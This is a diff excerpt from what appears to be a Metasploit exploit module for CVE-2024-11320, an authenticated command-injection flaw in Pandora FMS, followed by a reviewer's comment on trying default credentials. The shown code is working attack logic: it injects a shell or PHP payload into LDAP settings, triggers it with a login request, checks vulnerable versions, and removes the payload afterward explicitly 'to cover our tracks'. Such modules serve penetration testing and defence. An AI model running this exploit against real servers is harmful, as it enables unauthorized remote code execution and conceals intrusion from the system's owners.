modules/exploits/linux/http/pandora_fms_auth_rce_cve_2024_11320.rb

```diff
@@ -0,0 +1,350 @@
+        'double_auth_enabled_sent' => 1,
+        '2FA_all_users_sent' => 1,
+        'session_timeout' => 90,
+        'update_button' => 'Update',
+        'ldap_function' => 'local'
+      }
+    })
+    return res&.code == 200
+  end
+
+  # CVE-2024-11320: Command Injection leading to RCE via LDAP Misconfiguration
+  def execute_command(cmd, _opts = {})
+    # modify php payload to trigger the RCE
+    # if target['Type'] == :php_cmd
+    #  php_cmd = cmd.gsub(/'/, '"')
+    #  payload = "';php -r " + "\'#{php_cmd}\'" + ' #'
+    # else
+    #  payload = "';" + cmd + ' #'
+    # end
+    payload = "';#{target['Type'] == :php_cmd ? "php -r'#{cmd.gsub(/'/, '"')}'" : cmd} #"
+
+    # misconfigure LDAP settings with RCE payload
+    # clear cookies and execute dummy login to trigger the LDAP RCE payload
+    if configure_ldap(payload)
+      @clean_payload = true
+      cookie_jar.clear
+      send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'index.php'),
+        'vars_get' => {
+          'login' => 1
+        }
+      })
+    else
+      @clean_payload = false
+    end
+  end
+
+  def cleanup
+    # try to remove the payload from the LDAP settings to cover our tracks
+    # but do not run during the check phase
+    super
+    unless @check_running
+      # Disconnect from MySQL server
+      mysql_client.close if mysql_client
+      # check if payload should be removed
+      if @clean_payload
+        if pandora_login(@username, @password) && configure_ldap(nil)
+          print_good('Payload is successful removed from LDAP configuration.')
+          return
+        end
+        print_warning('Payload could not be removed from LDAP configuration. Try to clean it manually.')
+      end
+    end
+  end
+
+  def check
+    @check_running = true
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'keep_cookies' => true
+    })
+    unless res&.code == 200 && res.body.include?('PandoraFMS.com') || res.body.include?('Pandora FMS')
+      return CheckCode::Safe('Target is not a Pandora FMS application.')
+    end
+
+    html = res.get_html_document
+    full_version = html.at('div[@id="ver_num"]')
+    if full_version.blank?
+      return CheckCode::Detected('Could not determine the Pandora FMS version.')
+    end
+
+    full_version = full_version.text
+    version = full_version[1..].sub('NG', '')
+    if version.blank?
+      return CheckCode::Detected('Could not determine the Pandora FMS version.')
+    end
+
+    version = Rex::Version.new version
+    unless version >= Rex::Version.new('7.0.700') && version <= Rex::Version.new('7.0.777.4')
+      return CheckCode::Safe("Pandora FMS version #{full_version}")
+    end
+
+    CheckCode::Appears("Pandora FMS version #{full_version}")
+  end
+
+  def exploit
+    @check_running = false
+    # check if we can login at the Pandora Web application with the default admin credentials
```

Comment:
It seems unnecessarily noisy to try default creds every time this gets run?  Maybe hide this behind an option?  Or is this almost always left as default?